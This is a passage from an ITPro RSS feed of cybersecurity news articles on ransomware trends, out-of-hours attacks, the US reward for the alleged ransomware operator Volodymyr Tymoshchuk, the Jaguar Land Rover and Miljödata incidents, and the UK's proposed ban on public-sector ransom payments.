id="data-encryption-on-the-decline">Data encryption on the decline</h2><p>Traditionally, ransomware attacks see adversaries <a href="https://www.itpro.com/security/innovation-at-work/24460/what-is-data-encryption">encrypt</a> the data they steal, forcing firms to pay up if they want to get business back up and running. 
But companies are getting wise to this and, as a result, backups are improving. </p><p>This is driving cybercriminals to change tactics. The data breach aspect of ransomware is becoming the predominant method of extorting victims, rather than offers to decrypt data, says David Sancho, senior threat researcher at Trend Micro. “It used to be the case that the victim would <a href="https://www.itpro.com/security/ransomware/75-percent-of-uk-business-leaders-are-willing-to-risk-criminal-penalties-to-pay-ransoms">pay a ransom</a> for data decryption, but this is less common now. Instead, the victims tend to have better data backups.”</p><h2 id="changing-financial-impact">Changing financial impact</h2><p><a href="https://www.itpro.com/security/ransomware/ransomware-payments-are-banned-in-the-public-sector-should-businesses-still-pay"><u>Ransom payment bans</u></a> are being mooted in multiple countries, and this is already starting to have an impact on the number of firms actually paying up. </p><p>Although the overall rate of ransom payments has declined, possibly due to better preparedness and insurance changes, the average ransom amount has <a href="https://www.itpro.com/security/ransomware/average-ransom-payment-doubles-in-a-single-quarter"><u>steadily increased</u></a> through 2025, says Dunn. This suggests that while fewer victims are paying, those who do are facing higher financial demands.</p><p>In general, payment of ransoms has continued to drop year on year, says Gavin Knapp, cyber threat intelligence principal lead at Bridewell. 
“This is potentially linked to increased legislation around ransomware and tougher sanctions being placed on ransomware and cybercrime related entities.”</p><p>This is supported by <a href="https://www.chainalysis.com/blog/crypto-crime-ransomware-victim-extortion-2025/"><u>Chainalysis data</u></a> from February 2025, showing a 35% overall decrease in the total volume of ransom payments, which the firm attributed to stronger action by law enforcement, international collaboration, and greater hostility to paying on the part of victims.</p><h2 id="lone-wolf-attacks-and-vulnerabilities">Lone wolf attacks and vulnerabilities</h2><p>Ransomware attacks are traditionally carried out by groups, but a new trend is seeing so-called “lone wolves” operating in the market. There is a growing threat of ransomware attacks carried out by individuals or very small groups, says Allan Liska, a threat intelligence analyst at Recorded Future. “The lone wolves eschew the traditional RaaS model and operate independently in a bid to fly under the radar of the authorities.”</p><p>The number of lone wolves, or individual ransomware affiliates going it alone, has steadily increased over the past 18 months, says Knapp. He thinks this could be due to the fear of becoming the victim of an exit scam, where the RaaS operation ends without paying the affiliates their share. “The prevalence of leaked tools and RaaS source code has also made it much easier for attackers to go it alone or stand up their own ransomware group.”</p><p>Attackers are increasingly taking advantage of <a href="https://www.itpro.com/security/patch-management-why-firms-ignore-vulnerabilities-at-their-own-risk">unpatched software</a> to launch ransomware attacks. 
Groups such as <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-158a"><u>Cl0p</u></a> and <a href="https://www.itpro.com/security/ransomware/termite-ransomware-gang-claims-responsibility-for-blue-yonder-cyber-attack"><u>Termite</u></a> have become proficient in exploiting internet-facing software and services, says Knapp. “Performing vulnerability research and developing or acquiring exploits for software gives them the ability to compromise a large number of victims in one campaign, which increases the likelihood of receiving a bigger payout.”</p><p>The more time attackers can <a href="https://www.itpro.com/security/stealthy-malware-the-threats-hiding-in-plain-sight">spend inside systems undetected</a>, the more damage they can cause. It is with this in mind that groups and affiliates continue to spend time and resources on being able to evade endpoint detection and response (EDR) tools, says Knapp. “Numerous tools have emerged that allow ransomware groups to disable or blindside detection," he explains. "These tools take advantage of native software features to disable or blunt their capabilities, while others leverage vulnerable drivers to be able to terminate EDR processes.”</p><p>There’s a thriving underground market on the <a href="https://www.itpro.com/security/32117/what-is-the-dark-web">dark web</a>. Credentials to EDR consoles or testing services are openly bought and sold on forums and <a href="https://www.itpro.com/security/phishing/microsoft-and-cloudflare-just-took-down-a-major-phishing-operation">private messaging platforms</a>, says Jim Walter, senior threat researcher at SentinelLABS. “We’re seeing services pop up where adversaries can even trial their ransomware against real-world defences in semi-private labs.”</p><h2 id="how-to-respond-to-the-latest-trends">How to respond to the latest trends </h2><p>Ransomware is constantly evolving, but there are steps firms can take to prevent and mitigate attacks. 
</p><p>With adversaries taking advantage of unpatched vulnerabilities to compromise systems, it’s important to prioritize patching of public-facing devices, urges Brandon Tirado, director of threat research at ReliaQuest. </p><p>At the same time, reinforce <a href="https://www.itpro.com/security/29982/what-is-two-factor-authentication"><u>multifactor authentication (MFA)</u></a> with additional controls and require verification for reset requests, says Tirado. “<a href="https://www.itpro.com/security/a-new-silent-social-engineering-attack-is-being-used-by-hackers-and-your-security-systems-might-not-notice-until-its-too-late"><u>Social engineering</u></a> is one of the oldest hacking techniques, yet it remains highly effective. IT help desks with weak verification processes can be exploited to bypass MFA through simple reset requests.”</p><p>Overall, mitigating ransomware should be a company-wide effort. An effective means of defence is making sure employees know what they are up against, says Liska. “Regular staff training, updates and alerts can help keep staff vigilant against evolving threats.” </p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Cyber professionals are losing sleep over late night attacks ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/cyber-professionals-are-losing-sleep-over-late-night-attacks</link>
                                                                            <description>
                            <![CDATA[ Hackers are biding their time and launching attacks when businesses can’t respond ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">6MRfyAm2iFivsrNHEtUsjP</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/9ZT5mU7YeSN7Bg7YHh2LxX-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 18 Sep 2025 10:15:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                                                                <author><![CDATA[ ross.kelly@futurenet.com (Ross Kelly) ]]></author>                    <dc:creator><![CDATA[ Ross Kelly ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/Y5vrV2V98Np6jHAGmAtCd3.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/9ZT5mU7YeSN7Bg7YHh2LxX-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Female software developer coding in dark room with screen reflecting on glasses.]]></media:description>                                                            <media:text><![CDATA[Female software developer coding in dark room with screen reflecting on glasses.]]></media:text>
                                <media:title type="plain"><![CDATA[Female software developer coding in dark room with screen reflecting on glasses.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/9ZT5mU7YeSN7Bg7YHh2LxX-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p><a href="https://www.itpro.com/security/28133/what-is-cyber-security">Cybersecurity </a>professionals are being bombarded with alerts outside of business hours, with hackers deliberately timing their attacks for maximum impact.</p><p><a href="https://arcticwolf.com/resource/aw/security-operations-report-2025" target="_blank"><u>Research  from Arctic Wolf</u></a> shows more than half (51%) of alerts recorded by security operations teams are recorded after the majority of the business has clocked out. </p><p>Around 15% of all alerts also take place on weekends, the study found, forcing security workers to drop personal activities and respond to potential incidents. </p><div class="product"><a data-dimension112="9a969974-13ba-4754-9d57-6f5518a4f6fc" data-action="Deal Block" data-label="30% off Keeper Security's Business Starter and Business plans" data-dimension48="30% off Keeper Security's Business Starter and Business plans" href="https://www.keepersecurity.com/en_GB/affiliate/business/" target="_blank" rel="nofollow"><figure class="van-image-figure "  ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:310px;"><p class="vanilla-image-block" style="padding-top:52.58%;"><img id="VVXzWjJJrXo7mwL5n5f4mf" name="Keeper Security logo.png" caption="" alt="" src="https://cdn.mos.cms.futurecdn.net/VVXzWjJJrXo7mwL5n5f4mf.png" mos="" align="middle" fullscreen="" width="310" height="163" attribution="" endorsement="" credit="" class=""></p></div></div></figure></a><p><a href="https://www.keepersecurity.com/en_GB/affiliate/business/" data-dimension112="9a969974-13ba-4754-9d57-6f5518a4f6fc" data-action="Deal Block" data-label="30% off Keeper Security's Business Starter and Business plans" data-dimension48="30% off Keeper Security's Business Starter and Business plans" data-dimension25=""><strong>30% off Keeper Security's Business Starter and Business plans</strong></a></p><p>Keeper Security is trusted and 
valued by thousands of businesses and millions of employees. Why not join them and protect your most important assets while taking advantage of this special offer?<a class="view-deal button" href="https://www.keepersecurity.com/en_GB/affiliate/business/" target="_blank" rel="nofollow" data-dimension112="9a969974-13ba-4754-9d57-6f5518a4f6fc" data-action="Deal Block" data-label="30% off Keeper Security's Business Starter and Business plans" data-dimension48="30% off Keeper Security's Business Starter and Business plans" data-dimension25="">View Deal</a></p></div><p>Dan Schiappa, Arctic Wolf’s president of technology and services, said the study highlights the 24x7 nature of the profession and gives a glimpse into the challenges faced by teams. </p><p>“Today’s threat landscape is defined by round-the-clock attacks that target identity, exploit timing, and drive alert fatigue, leaving defenders to navigate increasingly complex tactics,” he said. </p><h2 id="hackers-are-biding-their-time">Hackers are biding their time</h2><p>Threat actors deliberately launch attacks outside of business hours or during holiday periods to maximize their chances of success, according to Arctic Wolf. </p><p>With skeleton crews essentially holding the fort, this represents the perfect opportunity to hit enterprise hard and leave teams scrambling. </p><p>“Some of the most notorious recent cyber attacks were meticulously planned to coincide with long weekends or holidays,” the study noted. </p><p>In 2021, the <a href="https://www.itpro.com/security/358401/hackers-publish-4000-sepa-files-ransomware-attack">Scottish Environmental Protection Agency (SEPA)</a> gained firsthand experience in this regard, with hackers striking on Christmas Eve.</p><p>The attack, claimed by the infamous <a href="https://www.itpro.com/security/ransomware/364177/conti-source-code-leaked-by-ukrainian-researcher">Conti </a>ransomware group, resulted in the theft of thousands of SEPA files. 
</p><p>Arctic Wolf’s findings align with previous research on these tactics, with analysis from Darktrace showing 76% of <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware </a>attacks occurring either after hours or over the weekend. </p><p>“As reduced staff wind down and employees mentally and physically log off from the workplace, there is a decline in the speed of detection and triage within an enterprise,” the company <a href="https://www.darktrace.com/blog/im-sorry-were-closed-why-most-ransomware-attacks-happen-out-of-hours" target="_blank"><u>noted</u></a>.</p><p>Similar <a href="https://www.semperis.com/ransomware-holiday-risk-report/" target="_blank"><u>analysis from Semperis</u></a> last year showed 72% of <a href="https://www.itpro.com/business/business-strategy/ransomware-victims-are-refusing-to-play-ball-with-hackers-just-17-percent-of-enterprises-have-paid-up-so-far-in-2025-marking-an-all-time-low">ransomware victims</a> were attacked outside of working hours, such as during holiday periods. </p><p>Notably, among organizations with dedicated security operations centers (SOCs), around 85% reduced staffing levels by up to 50% during holidays or weekends. </p><p>A key factor behind this, the study found, lay in general staffing challenges or the costs associated with overtime wages. </p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Prolific ransomware operator added to Europe’s Most Wanted list as US dangles $10 million reward ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/prolific-ransomware-operator-added-to-europes-most-wanted-list-as-us-dangles-usd10-million-reward</link>
                                                                            <description>
                            <![CDATA[ The US Department of Justice is offering a reward of up to $10 million for information leading to the arrest of Volodymyr Viktorovych Tymoshchuk, an alleged ransomware criminal. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">7Yemh7hwZhfC2bJ9cqNknY</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/mPh3wnjLq4AYLuZzD9ZuN7-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 10 Sep 2025 10:17:34 +0000</pubDate>                                                                                                                                <updated>Wed, 10 Sep 2025 10:18:06 +0000</updated>
                                                                                                                                            <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/mPh3wnjLq4AYLuZzD9ZuN7-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Police mugshot concept image showing silhouette of a man with back to wall.]]></media:description>                                                            <media:text><![CDATA[Police mugshot concept image showing silhouette of a man with back to wall.]]></media:text>
                                <media:title type="plain"><![CDATA[Police mugshot concept image showing silhouette of a man with back to wall.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/mPh3wnjLq4AYLuZzD9ZuN7-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The US Department of Justice (DoJ) is offering a reward of up to $10 million for information leading to the arrest of a notorious ransomware criminal.</p><p>The suspect, Volodymyr Viktorovych Tymoshchuk, is believed to be a leading figure in an organized crime network responsible for the 2019 <a href="https://www.itpro.com/ransomware/33266/aluminium-manufacturer-hydro-crippled-by-ransomware">ransomware attack against a major Norwegian aluminum company</a>, as well as a series of other global <a href="https://www.itpro.com/security/cyber-attacks">cyber attacks</a>. </p><p>"The fugitive is wanted by several countries and is considered a top priority target for international law enforcement," said Europol, which has added Tymoshchuk to its EU Most Wanted list. </p><p>The 28-year-old Ukrainian national has a series of aliases – Deadforz, Boba, Farnetwork, Msfv, and Volotmsk – and is wanted for computer-related crimes, participation in a criminal organization, and racketeering and extortion.</p><p>Between 2018 and 2020, Tymoshchuk and his accomplices took part in the deployment of the LockerGoga ransomware against hundreds of companies, disrupting operations and demanding a ransom. </p><p>The group's activities caused more than $18 billion in damage worldwide, Europol said.</p><p>“Volodymyr Tymoshchuk is charged for his role in ransomware schemes that extorted more than 250 companies across the United States and hundreds more around the world,” said US acting assistant attorney general Galeotti. </p><p>“In some instances, these attacks resulted in the complete disruption of business operations until encrypted data could be recovered or restored." </p><p>The international investigation has already led to the arrest of several other members of the criminal network in Ukraine. 
</p><p>According to the DoJ, law enforcement agencies have since mapped the structure of the group, identifying actors at every level – from <a href="https://www.itpro.com/malware/28076/what-is-malware">malware </a>developers and intrusion specialists to the money launderers responsible for handling the illicit proceeds.</p><p>The DoJ is also offering a separate reward of up to $1 million for information leading to the “arrest and/or convictions of other key leaders”. </p><h2 id="global-damages-range-in-the-tens-of-billions">Global damages range in the tens of billions</h2><p>The group is believed to have carried out attacks against organizations in 71 countries, specifically targeting large corporations and deploying MegaCortex, Nefilim, <a href="https://www.itpro.com/security/ransomware/us-government-offers-dollar10-million-reward-in-bid-to-track-down-hive-ransomware-leaders">HIVE</a>, and Dharma <a href="https://www.itpro.com/security/ransomware/367624/the-rise-of-double-extortion-ransomware">ransomware</a>, as well as LockerGoga.</p><p>Attacks took place through techniques including brute force attacks, <a href="https://www.itpro.com/hacking/34441/how-does-a-sql-injection-attack-work">SQL injections</a>, and sending <a href="https://www.itpro.com/security/29093/what-is-phishing">phishing </a>emails with <a href="https://www.itpro.com/security/cyber-attacks/malicious-urls-overtake-email-attachments-as-the-biggest-malware-threat">malicious attachments</a> in order to steal usernames and passwords.</p><p>Once inside a network, the attackers remained undetected and gained additional access using tools including <a href="https://www.itpro.com/security/malware/357994/new-trickbot-variant-can-interfere-with-uefi-and-bios">TrickBot malware</a>, <a href="https://www.itpro.com/security/cyber-crime/cobalt-strike-takedown-fortra-microsoft">Cobalt Strike</a>, and PowerShell Empire to compromise as many systems as possible before triggering ransomware attacks.</p><p>They are 
believed to have encrypted more than 250 servers belonging to large corporations, resulting in losses exceeding several hundred million euros.</p><h2 id="who-is-volodymyr-viktorovych-tymoshchuk">Who is Volodymyr Viktorovych Tymoshchuk?</h2><p>Between July 2020 and October 2021, Tymoshchuk was one of the administrators of Nefilim ransomware, a ransomware as a service (RaaS) enterprise that provided tools to affiliates in return for a percentage of the extortion payments they collected. </p><p>Nefilim ransom notes typically threatened the victims that, unless they paid up, the stolen data would be published on the group's publicly accessible Corporate Leaks websites. </p><p>“Tymoshchuk is a serial ransomware criminal who targeted blue-chip American companies, health care institutions, and large foreign industrial firms, and threatened to leak their sensitive data online if they refused to pay,” said Joseph Nocella, US attorney for the Eastern District of New York. </p><p>“For a time, the defendant stayed ahead of law enforcement by deploying new strains of malicious software when his old ones were decrypted. 
Today’s charges reflect international coordination to unmask and charge a dangerous and pervasive ransomware actor who can no longer remain anonymous.”</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Jaguar Land Rover “did the right thing” shutting down systems to thwart cyber attack ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/cyber-attacks/jaguar-land-rover-did-the-right-thing-shutting-down-systems-to-thwart-cyber-attack</link>
                                                                            <description>
                            <![CDATA[ The attack on Jaguar Land Rover highlights the growing attractiveness of the automotive sector ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">D57UajELbiS6N9VR6p5zoH</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/9pwYva8LtuzWuM93eM7TCd-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 03 Sep 2025 10:14:36 +0000</pubDate>                                                                                                                                <updated>Wed, 03 Sep 2025 10:15:07 +0000</updated>
                                                                                                                                            <category><![CDATA[Cyber Attacks]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/9pwYva8LtuzWuM93eM7TCd-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Jaguar Land Rover dealership with Jaguar and Land Rover logos pictured on a sign. ]]></media:description>                                                            <media:text><![CDATA[Jaguar Land Rover dealership with Jaguar and Land Rover logos pictured on a sign. ]]></media:text>
                                <media:title type="plain"><![CDATA[Jaguar Land Rover dealership with Jaguar and Land Rover logos pictured on a sign. ]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/9pwYva8LtuzWuM93eM7TCd-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Jaguar Land Rover was forced to shut down production systems over the weekend after being hit with a cyber attack, the company has revealed. </p><p>The car manufacturer said it acted immediately to mitigate the attack by proactively shutting down systems in a move that thwarted attackers. </p><p>"We are now working at pace to restart our global applications in a controlled manner," JLR said in a statement. "At this stage there is no evidence any customer data has been stolen but our retail and production activities have been severely disrupted."</p><p><a href="https://www.bbc.co.uk/news/articles/c9wywvllq7wo" target="_blank"><u>According to the </u><u><em>BBC</em></u></a>, the attack took place on Sunday, with employees at the company's plants in Halewood, Merseyside, and Solihull in the West Midlands sent home or told not to come into work the following day.</p><p>"JLR's decision to proactively shut down global manufacturing suggests this attack may have been targeting their operational systems, not just customer data," said Oakley Cox, director of operational technology of product at Darktrace.</p><p>"The speed of their response is telling - you don't typically halt production across multiple sites unless there's genuine concern about operational impact."</p><p>The attack appears to have been carefully timed, coming just as new registration plates are launched - the company's busiest time of year. Attacking over the weekend, meanwhile, meant that Jaguar Land Rover was less likely to be able to respond and contain the threat.</p><p>No <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware </a>group has claimed responsibility. 
However, the automotive sector is becoming a highly attractive target for hackers, thanks to increasing digitization and growing integration between IT and operational technology (OT).</p><p>According to Upstream Security’s <a href="https://upstream.auto/reports/global-automotive-cybersecurity-report/" target="_blank"><u>2025 </u><u><em>Automotive & Smart Mobility Cybersecurity</em></u></a> report, attacks against the automotive sector are on the rise - and getting bigger. The number of 'massive-scale' incidents, impacting millions of vehicles, more than tripled between 2021 and 2023, rising from 5% to 19%.</p><h2 id="jaguar-land-rover-did-the-right-thing">Jaguar Land Rover “did the right thing”</h2><p>Nivedita Murthy, senior security consultant at Black Duck, said Jaguar Land Rover “did the right thing” by shutting down IT systems, which likely helped prevent the attack from spreading further and causing additional damage. </p><p>“As part of the post-incident activity, they would be able to identify how the attackers were able to access the systems and take advantage of them,” Murthy added. </p><p>Conversely, Nick Tausek, lead security automation architect at Swimlane, said the move raises serious questions about how organizations should react to security incidents. </p><p>"It is tentatively reassuring to see that, as of yet, no impact on customer data has been reported. However, entirely shutting down production and retail operations is not a sustainable countermeasure for cyber attacks," he said. </p><p>"JLR, as well as other automobile manufacturing organizations, should use this as a lesson in the importance of proactive cybersecurity."</p><p>This isn’t the first time the car manufacturer has fallen victim to a cyber attack. Earlier this year, it was hit by a breach that saw the theft of several gigabytes of sensitive data. 
</p><p>That particular incident exposed more than 700 proprietary documents, along with source code and employee and partner data.</p><p>"It raises the question of whether vulnerabilities from the prior attack still exist and were exploited to breach the company this time around," suggested Tausek.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Ransomware attack on IT supplier disrupts hundreds of Swedish municipalities ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/cyber-attacks/ransomware-attack-on-it-supplier-disrupts-hundreds-of-swedish-municipalities</link>
                                                                            <description>
                            <![CDATA[ The attack on IT systems supplier Miljödata has impacted public sector services across the country ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">QgB2y2LYqEb9N6S88Y8euB</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/iLRESJd4Q6KcThu2x6AsoQ-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 01 Sep 2025 09:38:52 +0000</pubDate>                                                                                                                                <updated>Mon, 01 Sep 2025 13:30:59 +0000</updated>
                                                                                                                                            <category><![CDATA[Cyber Attacks]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/iLRESJd4Q6KcThu2x6AsoQ-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Flag of Sweden flying in the wind with blue skies and light clouds in background.]]></media:description>                                                            <media:text><![CDATA[Flag of Sweden flying in the wind with blue skies and light clouds in background.]]></media:text>
                                <media:title type="plain"><![CDATA[Flag of Sweden flying in the wind with blue skies and light clouds in background.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/iLRESJd4Q6KcThu2x6AsoQ-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>200 municipalities and regional governments in Sweden have been severely disrupted following a <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware </a>attack on IT systems supplier Miljödata.</p><p>The company, which supplies HR systems to around 80% of the country’s municipal governments, discovered the breach on Saturday 23 August, authorities said. </p><p>"The government is receiving ongoing information about the incident and is in close contact with the relevant authorities," <a href="https://x.com/CarlOskar/status/1960358157965734144"><u>said</u></a> Swedish minister for civil defence Carl-Oskar Bohlin. </p><p>"CERT-SE, which has the task of supporting Swedish society in handling and preventing IT security incidents, has offered advice and support to both the company in question and the affected customers." </p><p>Bohlin said the country's national cybersecurity center is coordinating disclosure to the relevant authorities, and that a police investigation is underway. The full effects of the breach have not yet been established, he added.</p><p>However, regions including Halland and Gotland have warned citizens that their personal data may have been affected. 
Halland <a href="https://www.regionhalland.se/nyheter/nyheter/2025-08-26-region-hallands-leverantor-av-arbetsmiljosystem-ar-utsatt-for-cyberangrepp"><u>said</u></a> its Adato sick leave management system, Stella work-related injury reporting system, and Novi HR management system are currently down.</p><p>The Gotland region, meanwhile, uses four Miljödata systems, handling medical certificates, rehabilitation plans, occupational injuries, and more.</p><p>“Region Gotland is one of many regions and municipalities that are affected by the cyber attacks that Miljödata is exposed to,” <a href="https://gotland.se/arkiv/nyheter/allmant/2025-08-26-region-gotlands-leverantor-av-arbetsmiljosystem-ar-utsatta-for-cyberangrepp" target="_blank"><u>said</u></a> the region's HR Director Lotta Israelsson.</p><p>"At present, there are extensive investigations at Miljödata to investigate the extent of the attack and we are in continuous contact with the supplier."</p><p>No ransomware group has claimed responsibility for the attack. However, Miljödata has reportedly received a ransom demand of 1.5 bitcoin - just $163,245 - implying that it's unlikely to be one of the big players.</p><p>“The attack in Sweden shows the reality that for cyber criminals, targeting <a href="https://www.itpro.com/software/software-supply-chain-attacks-are-rife-this-is-what-developers-need-to-watch-out-for">supply chain vulnerabilities</a> is one of the most effective levers to cause disruption at scale," said Andrew Lintell, general manager, EMEA, at Claroty.</p><p>"By compromising a single IT system supplier can cripple vital functions and processes in one strike."</p><h2 id="miljoedata-attack-the-latest-to-target-public-sector">Miljödata attack the latest to target public sector</h2><p>Supply chain attacks on government organizations are on the rise around the world, and Sweden is no exception. 
</p><p>Last year, for example, Swedish IT services and cloud hosting provider Tietoevry was hit by a <a href="https://www.tietoevry.com/en/newsroom/all-news-and-releases/press-releases/2024/04/tietoevry-conclusions-on-the-ransomware-attack/" target="_blank"><u>ransomware attack</u></a>, again involving HR systems, that affected businesses and government agencies including Sweden’s national government service center.</p><p>"For municipalities and other public-sector entities, this event shows the urgent need to treat third-party and supply chain security as a core pillar of resilience," said Lintell.</p><p>"That means maintaining full visibility into all connected systems and taking on the responsibility of continuously assessing the security posture of vendors. It is key to enforce least-privilege access and ensure that contingency plans are in place to keep essential operations running even when a trusted provider is compromised."</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Ransomware payments are banned in the public sector: should businesses still pay? ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/ransomware-payments-are-banned-in-the-public-sector-should-businesses-still-pay</link>
                                                                            <description>
                            <![CDATA[ The UK government is introducing a ban on ransomware payments for the public sector and critical national infrastructure – but there could be unintended consequences ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">eNhVRYYSFLfX22VhbcYfF8</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/M52ds9wEZCmgUf2Bzb8fkM-1280-80.png" type="image/png" length="0"></enclosure>
                                                                        <pubDate>Fri, 29 Aug 2025 09:50:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Stephen Pritchard ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/png" url="https://cdn.mos.cms.futurecdn.net/M52ds9wEZCmgUf2Bzb8fkM-1280-80.png">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[A black and white hand holding a drawing of a white, square-handled key. Instead of teeth, the key has the number &quot;10110&quot; representing binary code and encryption. The hand and key are set against a solid blue background.]]></media:description>                                                            <media:text><![CDATA[A black and white hand holding a drawing of a white, square-handled key. Instead of teeth, the key has the number &quot;10110&quot; representing binary code and encryption. The hand and key are set against a solid blue background.]]></media:text>
                                <media:title type="plain"><![CDATA[A black and white hand holding a drawing of a white, square-handled key. Instead of teeth, the key has the number &quot;10110&quot; representing binary code and encryption. The hand and key are set against a solid blue background.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/M52ds9wEZCmgUf2Bzb8fkM-1280-80.png" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The UK could soon become the first country to ban <a href="https://www.itpro.com/business/business-strategy/ransomware-victims-are-refusing-to-play-ball-with-hackers-just-17-percent-of-enterprises-have-paid-up-so-far-in-2025-marking-an-all-time-low"><u>ransomware payments</u></a>, or at least, payments from public funds. This is the result of a new government consultation on legislation that, if enacted, could create a legal ban on ransomware payments by the public sector and regulated organizations that oversee <a href="https://www.itpro.com/security/cyber-attacks/why-attacks-against-critical-national-infrastructure-cni-are-such-a-threat"><u>critical national infrastructure (CNI)</u></a>.</p><p>These proposals also put forward measures to increase cyber incident reporting from organizations not covered by the “targeted ban” on ransomware payments. 
The goal, according to the Home Office, is to increase transparency and intelligence around cyber attacks, and disrupt the flow of public funds to criminal groups.</p><p>“The ban would target the business model that fuels cyber criminals’ activities and makes the vital services the public rely on a less attractive target for ransomware groups,” the Home Office <a href="https://www.gov.uk/government/news/uk-to-lead-crackdown-on-cyber-criminals-with-ransomware-measures" target="_blank"><u>wrote</u></a>.</p><p><a href="https://www.itpro.com/security/cyber-attacks/m-and-s-chair-calls-for-mandatory-reporting-of-cyber-attacks-after-traumatic-ransomware-incident-but-will-it-do-more-harm-than-good"><u>Mandatory reporting</u></a>, for its part, should improve the intelligence available to law enforcement agencies. Businesses not covered by the ban would have to tell the Government if they intended to pay a ransom.</p><p>As security minister Dan Jarvis said, announcing the consultation results last month, “ransomware is a predatory crime that puts the public at risk, <a href="https://www.itpro.com/security/the-hidden-cost-of-ransomware-is-more-painful-than-many-realize"><u>wrecks livelihoods and threatens the services</u></a> we depend on. That’s why we’re determined to smash the cyber criminal business model and protect the services we all rely on.”</p><p>Banning ransomware payments by the public sector is popular, at least according to the consultation. The Government says that 72% of respondents agreed to the idea of a “targeted ban” for public sector bodies and CNI owners and operators. 
